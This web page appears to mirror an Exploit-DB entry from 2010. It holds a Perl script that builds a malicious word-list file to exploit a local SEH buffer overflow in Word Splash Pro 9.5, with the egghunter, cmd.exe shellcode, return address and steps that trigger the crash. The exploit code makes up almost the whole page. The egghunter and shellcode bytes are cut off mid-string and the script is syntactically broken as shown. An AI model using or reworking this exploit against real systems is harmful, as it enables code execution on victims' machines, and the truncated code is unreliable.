Word Splash Pro 9.5 – Local Buffer Overflow

  • 作者: h1ch4m
    日期: 2010-12-20
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/15782/
  • # Exploit Title: Word Splash Pro<= 9.5 Buffer Overflow -EggHunter-
    # Software Link: http://www.chronasoft.com/software/wordsplashpro
    # Version: <= 9.5
    # Tested on: Win XP SP3 French
    # Date: 20/12/2010
    # Author: h1ch4m
    #Email: h1ch4m@live.fr
    #Home: Net-Effects.blogspot.com
    #Greetz : Peter Van Eeckhoutte, Exploit-Database Team,Zhir0
    #Note: tested on version 9.5 & 8.3,you may have to change the address of pop pop ret according to your sp & the program version
    # triggering details:file->Word list->Import then click on Word List Builder button 
    my $file = "1.wsl";
    my $size = 4112;
    my $nseh = "\xeb\x06\x90\x90"; # jump 6 bytes
    my $seh = pack('V', 0x01de44dc); # pop pop retfrom CRDE2000.DLL
    my $egg = "w00tw00t";
    my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
    # Shellcode :windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes - Mountassif Moad aka Stack
    my $shellcode = "\x8B\xEC\x33\xFF\x57".
    my $junk = "\x90" x ($size-length($egg.$shellcode));
    print $FILE $egg.$shellcode.$junk.$nseh.$seh.$egghunter;
    print "File Created successfully\n";